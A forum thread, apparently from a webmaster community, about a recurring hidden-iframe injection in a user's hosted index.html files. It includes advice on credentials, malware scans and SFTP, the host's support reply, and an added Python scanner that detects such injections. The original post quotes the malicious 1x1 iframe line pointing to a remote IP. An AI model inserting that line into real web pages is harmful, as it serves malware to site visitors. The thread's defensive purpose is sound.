Help there's a virus or hacker attacking my index.html files - has this happened to you?

32 replies
Hi folks

Over the last few days I've had 3 of my sites (which reside on hostgator) either hacked or virus affected.

It inserts this line in the index.html file just after the head code: -

<iframe src="91.201.28.6/goods/index.php" width="1" height="1" frameborder="0"></iframe>'; ?>

Causes Google Chrome to warn users to avoid your site; not sure if it's doing any other harm.

I can remove it manually from the code but it's coming back again!

Any feedback appreciated

Regards
Bobby
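A defender-side check for the symptom described in this post, added here as an example and not code from anyone in the thread: it walks a local copy of a web root, flags `<iframe>` tags sized to 1 or 0 pixels (the shape of the quoted line) and PHP tags inside plain .html files, and lists files changed in the last few days so a file buried deep in the tree stands out. The directory layout and the sample pages are constructed for the demonstration; only the iframe line itself is the one quoted above.

```python
"""Spot injected hidden iframes in a local copy of a site's HTML files.

Added example (not code from the thread): scans a web root for the pattern
the post quoted, an <iframe> sized to 1x1 pixels, plus stray PHP tags left
in plain .html files, and lists files touched in the last few days so a
file buried deep in the tree stands out.
"""
import re
import tempfile
import time
from pathlib import Path

# Any <iframe ...> start tag.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# A width or height of 0 or 1 pixel: the iframe is meant to be invisible.
HIDDEN_DIM_RE = re.compile(r"\b(?:width|height)\s*=\s*[\"']?\s*[01]\b", re.IGNORECASE)
# PHP tags have no business in a static .html file; the quoted line ended in "'; ?>".
PHP_TAG_RE = re.compile(r"<\?php|\?>", re.IGNORECASE)

# Constructed sample pages for the demonstration. The iframe line is the one
# quoted in the original post; everything around it is made up.
INFECTED_PAGE = """<html>
<head><title>Shop</title></head>
<iframe src="91.201.28.6/goods/index.php" width="1" height="1" frameborder="0"></iframe>'; ?>
<body>Welcome</body>
</html>
"""
CLEAN_PAGE = """<html>
<head><title>Shop</title></head>
<body><iframe src="https://example.com/embed" width="560" height="315"></iframe></body>
</html>
"""


def suspicious_lines(html):
    """Return (line_no, reason, line) for each line that looks injected."""
    hits = []
    for no, line in enumerate(html.splitlines(), start=1):
        if any(HIDDEN_DIM_RE.search(tag) for tag in IFRAME_RE.findall(line)):
            hits.append((no, "hidden iframe", line.strip()))
        if PHP_TAG_RE.search(line):
            hits.append((no, "php tag in static html", line.strip()))
    return hits


def scan_webroot(root):
    """Map each .htm/.html file under root to its suspicious lines (files with hits only)."""
    findings = {}
    for path in sorted(Path(root).rglob("*.htm*")):
        hits = suspicious_lines(path.read_text(errors="replace"))
        if hits:
            findings[str(path.relative_to(root))] = hits
    return findings


def recently_modified(root, days=7):
    """Relative paths of files under root modified within the last `days` days."""
    cutoff = time.time() - days * 86400
    return sorted(
        str(p.relative_to(root))
        for p in Path(root).rglob("*")
        if p.is_file() and p.stat().st_mtime >= cutoff
    )


def demo():
    """Build a throwaway web root from the constructed pages and scan it."""
    with tempfile.TemporaryDirectory() as root:
        (Path(root) / "site1").mkdir()
        (Path(root) / "site2").mkdir()
        (Path(root) / "site1" / "index.html").write_text(INFECTED_PAGE)
        (Path(root) / "site2" / "index.html").write_text(CLEAN_PAGE)
        findings = scan_webroot(root)
        for rel, hits in findings.items():
            for no, reason, text in hits:
                print(f"{rel}:{no}: {reason}: {text}")
        print("changed in the last 7 days:", recently_modified(root))
        return findings


if __name__ == "__main__":
    demo()
```

Run it against a fresh download of the affected site rather than the live server, and treat the modified-files list as the starting point for the "look for unfamiliar files" advice given later in the thread: a line removed from index.html will keep returning until whatever writes it (a stolen credential or a script elsewhere in the account) is dealt with.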
  • chassm
    Sounds like if it's affecting your sites on your hosting account, it may be affecting others as well. Have you contacted Hostgator? They should be able to assist; start with them.
  • Istvan Horvath
    The other thing to always do in similar cases: change all your passwords immediately.
    Better yet, check your computer for spyware/keyboard loggers - maybe the hackers got the login info from your computer... and change the passwords AFTER the machine is cleaned.
    • bobcath
      Hi folks

      I've just contacted Hostgator awaiting reply.

      Also scanning PC with 2 malware and virus scanners.

      I've read in the last few minutes on Google that it attacks your FTP login details?

      Wow is this annoying...

      Bobby
      • chassm
        Absolutely, there are so many ways to get infected, and unfortunately hosting companies are not that great at keeping these threats off their systems and your sites. I think it's in their disclaimer.

        You just gotta fight it out with them and get them to scan the system your sites are on. Something keeps making those changes, meaning whoever is doing this has control of the system remotely.
  • duncanb
    Out of interest, what sort of internet security are you using?
  • bobcath
    Thanks Charlie

    And Duncan, I use the paid version of Malwarebytes and Spyware Doctor, both with live detection enabled.
    • paradox_qu
      FTP is one of the most insecure protocols on the internet. It sends your passwords and usernames in plain text, so anyone between you and your server can read them.

      I see that Hostgator allows SSH. So to transfer files I would use scp or sftp. These encrypt your passwords and help keep you secure.
      • Heidi White
        Originally Posted by paradox_qu:

        FTP is one of the most insecure protocols on the internet. It sends your passwords and usernames in plain text, so anyone between you and your server can read them.

        I see that Hostgator allows SSH. So to transfer files I would use scp or sftp. These encrypt your passwords and help keep you secure.

        I use Filezilla for FTP; is there a similarly easy-to-understand SCP or SFTP program you can recommend?
  • Floyd Fisher
    1. Change passwords immediately. More than likely, they have 'em.

    2. Contact Hostgator support like yesterday so they know what's going on. Have them give you the access logs for your account for the last several days. This way, you might be able to figure out which IPs the attack is coming from, so you can block it.

    Get off the forum, and do this NOW!
  • williamrs
    1. Scan your PC and eliminate spyware (hopefully you have a good anti-spyware program and will not need to format your computer)
    2. Change your passwords
  • Dennis Gaskill
    In addition to what others have said, disable Anonymous FTP; it's usually enabled by default. Then look at all your folders and look for unfamiliar files. Hackers often place a script deep in your site somewhere where you wouldn't readily notice it. You can delete things all day, but if there is a hidden script it can keep changing it back. When my site was hacked I found a script buried in a CSS folder two or three levels deep.
  • bobcath
    Hi all

    Thanks very much for the advice, it's appreciated. I've done everything that you have suggested. Changed cPanel password, scanned, contacted Hostgator.

    Dennis, I'm not too sure how to disable 'anonymous FTP'. Is that on the Hostgator panel or in my own FTP program (SmartFTP)?

    In case it helps others, here is the reply from Hostgator too. Not sure there is anything further from what you guys have already told me, but at least they did get back to me very quickly.


    The infection is consistent with many variant malware infections on users' PCs. Your cPanel password has been compromised and used to add this malicious content. Please change it immediately.

    Here is a list of steps that you can take to ensure your sites remain secure:

    1. Use the following online vulnerability scanner and ensure your software is up-to-date: Scan Now - Online (OSI) - Vulnerability Scanning - Secunia.com
    2. Download anti-virus and fully scan your PC for malicious files. Here are some free online scanners for Windows, which is typically the most vulnerable to infection. If you have a different OS, there are similar programs that can be located and run on your system to protect it in the same way:
    MalwareBytes ( Malwarebytes.org ) and
    ComboFix ( A guide and tutorial on using ComboFix ) have been reported to be able to clean a recent strain of malware that resists detection by almost all other anti-virus agents. It is highly suggested that you run one or both of them and one of the following:
    - http://housecall.trendmicro.com/
    - http://www.bitdefender.com/scan8/ie.html
    - http://www.kaspersky.com/virusscanner
    - http://support.f-secure.com/enu/home/ols.shtml
    - http://www.eset.com
    3. Update all passwords for any account that you access/own that may not be up to standards. Any passwords that have been compromised will need to be changed as well. Standards for secure passwords are available: Password strength - Wikipedia, the free encyclopedia
    4. Ensure that all scripts/plugins/modules/components are updated to the most recent released version, as new versions are released primarily to address known security vulnerabilities in these sites.
    5. Keep your computer secure from malware infecting it. If your computer is compromised, your account can be compromised through your password being used to access it.
    - Ensure you use the latest browser version; Ensure that said browser subscribes to Google's blacklist API (Mozilla Firefox, Google Chrome, Safari)
    - Disable javascript
    - Use the firefox addon noscript
    - Make sure your antivirus has a subscription to new database and version releases. This may cost some amount of money, but is well worth the expense.
    - Use AVG Online Virus Scanner | Scan Web Pages | AVG LinkScanner Drop Zone to test suspicious links you are given in emails or find online.
    6. Ensure that all database configurations for your account are using a custom generated user and password combination, and that this information is not stored in plain text if this is feasible. Using your cPanel username and password to access your databases for your site may be convenient, but it introduces an incredible security risk.
    7. Audit your account for unnecessary scripts, such as file uploaders. Ensure that if they are necessary that they are password protected, or if that is not feasible that they check the file type before allowing upload, to prevent upload of certain types of files.
  • Ashley Skuse
    Watch out that you don't get listed as a threatful site in Google search results. Once the problem is fixed, you can submit your site for review through Google Webmaster Tools and eventually they'll remove the threat alert.

    There's nothing worse than potential customers being driven away by stuff like that. It has happened to me before and it sucks!
  • bobcath
    Yes Ashley, my sites were getting listed as threatful sites through Google! And yes, it sucks!

    May be helpful for others to know that the quick way to discover anything like this is to use Google Chrome to try to open your site. I say this because all the other browsers did not alert me; only Google Chrome did!

    I'll go to Webmaster Tools and check if I need to resubmit. I hopefully fixed this in time so that Google may not have deindexed my sites... what was your experience?

    Bobby
  • Peter Bestel
    Bobby

    Exact same thing happened to me a few months back. Reasonably confident that it was malware on my PC that got hold of my FTP credentials.

    Changing the passwords for every single host-related function is essential, but only useful if you've got rid of the cause.

    They may well have installed a hidden script on your server as Dennis mentioned. If you've got a back-up that predates the infection by a week or so then I'd recommend wiping everything and starting afresh - I know that seems daunting but it may well be the quickest option you have.

    Cleaning your PC may prove endless too. Malwarebytes is good, but didn't find the malware I had. A-squared is what eventually cleared it out.

    If it's a blog that's infected (quite common) then get yourself a copy of Craig Desorcy's Blog Lockdown - some good info in that to help prevent future attacks.

    Blog Lock Down: Secure Your Wordpress Blog Today (not aff link)

    Good luck

    Peter
  • bobcath
    Peter

    Thanks for the tips.

    You're right, Malwarebytes in my experience is good, but it didn't find anything on my PC. Nor did Spyware Doctor. I'll have a look at A-Squared.

    Frustrating though, wondering if it's still on my PC or on the servers, and even though I've changed all passwords it could strike again!

    Will let you know if A-squared finds it.

    Thanks again
    Bobby
    • bobcath
      Well

      Downloaded A Squared and ran a check. Now bear in mind that I run Malwarebytes and Spyware Doctor every day....

      A Squared found over 100 'malware': 12 high risk, about 40 medium risk and the rest low risk.

      Now I know that some products will do this to sell you the full version, but it will be interesting to see if it has gotten rid of the malware which caused my index.html files to be hacked.

      Will let you know

      Bobby
  • Peter Bestel
    Bobby

    A-Squared IS very good, but can throw up a lot of false positives - double check your results before recklessly hitting the delete button.

    Peter
    • innocent07
      Hackers getting passwords, keyword logger?

      How can we prevent all these things happening, or how can we at least reduce the chances of the above happening? (+ avoid people hacking your accounts) ??
      • -prodigy-
        Originally Posted by innocent07:

        Hackers getting passwords, keyword logger?

        How can we prevent all these things happening, or how can we at least reduce the chances of the above happening? (+ avoid people hacking your accounts) ??

        Aside from the usual - keeping your computer and software programs up-to-date, running a good anti-virus program etc...

        I would recommend an excellent free program called SnoopFree.

        SnoopFree is an anti-keylogging program that - instead of scanning for known threats - alerts you whenever ANY program attempts to log keystrokes or capture screenshots.

        I don't think I have enough posts to include a link; however, the website address is SnoopFree dot com, or you can enter SnoopFree in your favorite search engine.

        Hope this helps. It's a great program and it's free.
      • Peter Bestel
        Originally Posted by innocent07:

        Hackers getting passwords, keyword logger?

        How can we prevent all these things happening, or how can we at least reduce the chances of the above happening? (+ avoid people hacking your accounts) ??

        Prevention is the best course of action. PAY for your anti-virus (I believe the new Norton Security Suite is now very good) and use Roboform - I haven't typed a password for ages!

        Peter
      • paradox_qu
        Originally Posted by innocent07:

        Hackers getting passwords, keyword logger?

        How can we prevent all these things happening, or how can we at least reduce the chances of the above happening? (+ avoid people hacking your accounts) ??

        The best way to prevent being infected by malware/spyware and viruses is to not use Windows. Use Linux, more specifically Ubuntu; it is free and not susceptible to Windows viruses. It is even more secure than Mac. You don't have to be a huge computer nerd to use Ubuntu; it makes it just as easy as Windows or Mac. It is what I use on all my computers.

        @MostlyHarmless

        You can SFTP through Filezilla. The easiest way to SFTP through Filezilla is to change the port number. In the top bar where it says host: user: password: port:

        For the port enter 22 (22 is the standard SSH port. It allows FTP to encrypt the traffic over SSH. I know, probably too much info)

        or alternately for the host you can put:
        sftp://HOSTNAME

        -Nick
  • bobcath
    Yes, good tip Peter, it's easy to assume that everything it finds is malicious. I check each file before taking action. Some are exe files, so you're right, it is worth checking first.

    Fingers crossed my index.html problem appears to be away... but don't want to speak too soon!

    I now have 3 different spyware and anti-virus programmes running live at the same time; there appears to be no conflict. Computer is slightly slower, but after experiencing the hacked web files it's a price worth paying.

    Bobby
    • tonygol
      I had the same thing happen to me repeatedly last June. It turns out iFrame attacks are the result of bots exploiting security vulnerabilities in your hosting.

      After multiple attacks, my hosting company referred me to a company called 54f3.com, which may now be called sitesecuritymonitor.com. I signed up for their scanning service, which found multiple vulnerabilities in my server, including FTP and a very long list of others. They also suggested the fixes to secure what they called the perimeter, which cost extra, but after I implemented all their changes and the vulnerability scan came up clean (zero vulnerabilities), my site stopped getting defaced with these iFrame attacks and has been very stable for the past 7 months.
  • bobcath
    Thanks for this info Tony.

    My Malwarebytes is now flagging up and blocking access to IP 94.228.209.171

    Does anyone have any idea what site this is? I guess it could be a server which hosts malware sites??

    Thanks
    Bobby
  • istok
    First, scan the computer for all viruses and malware. Use Malwarebytes for it.
    Then CHANGE the FTP password. And give it to no one else.
    Maybe someone else with FTP access has had that virus on their computer (or still has) and it infected your html files.
    • Dennis Gaskill
      Originally Posted by bobcath:

      Dennis, I'm not too sure how to disable 'anonymous FTP'. Is that on the Hostgator panel or in my own FTP program (SmartFTP)?

      Bob, log into your control panel and look for an icon or text link for Anonymous FTP. I don't use Hostgator so I can't tell you where to find it. Once you find it, click through and disabling it should be self-explanatory.
  • paradox_qu
    You have to realize that if you are on a home network and you are running FTP, then if any computer on the network is infected it can sniff out and steal your passwords. Even if your computer is clean but your wife's computer isn't, then your wife's computer can be sniffing for passwords on the network. That's why I recommend using scp or sftp. It encrypts all the traffic, so anyone on any network can't sniff your passwords.
  • WD Mino
    Hi,
    You must use a high-security scanner to find the vulnerabilities. You have done nothing wrong; the software you're using is just not as good as this one: Website Security - Acunetix Web Security Scanner

    Download and use that; you will probably need to upload your file again after scanning.
    -WD
  • bobcath
    To everyone who gave me advice THANK YOU!

    Here is the sequence I went through to get rid of it, if it helps anyone else here.

    1. Changed FTP password
    2. Removed FTP password from the client and only paste it into the login box when using FTP
    3. Ran 'A Squared', which found and deleted many trojans

    At this point it was still infiltrating

    4. Reinstalled my Windows XP OS (along with 58 updates!)

    Problem now gone.

    Again thanks to you all, this is a great forum.

    Bobby
  • Mili_D
    These hackers or viruses are getting smarter by the day; even changing your password is worthwhile only for some time until they manage to do the same. I hope you get this sorted, good luck with the thing.
  • bobcath
    Thanks Mili_D

    Yes, you're right, hope I've made it just a little harder for that to happen....

    I have now removed my password completely from my FTP programme. I enter it only when I use it and then remove it again.